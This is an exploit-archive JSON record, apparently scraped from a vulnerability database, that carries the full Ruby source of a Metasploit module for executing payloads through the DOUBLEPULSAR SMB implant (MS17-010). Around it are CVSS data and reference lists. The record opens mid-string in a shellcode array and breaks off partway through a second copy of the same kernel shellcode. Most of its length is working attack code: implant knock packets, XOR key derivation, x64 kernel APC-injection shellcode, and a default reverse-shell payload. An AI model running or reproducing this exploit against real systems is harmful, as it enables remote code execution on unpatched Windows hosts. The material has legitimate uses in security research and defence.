\"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-06] #"}, "lastseen": "2021-10-05T22:17:33", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "eefb8288df9b0d8c7d7ee0c8a8b15530", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-06T22:19:02", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", 
"1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-05T22:17:33", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-05T22:17:33", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n 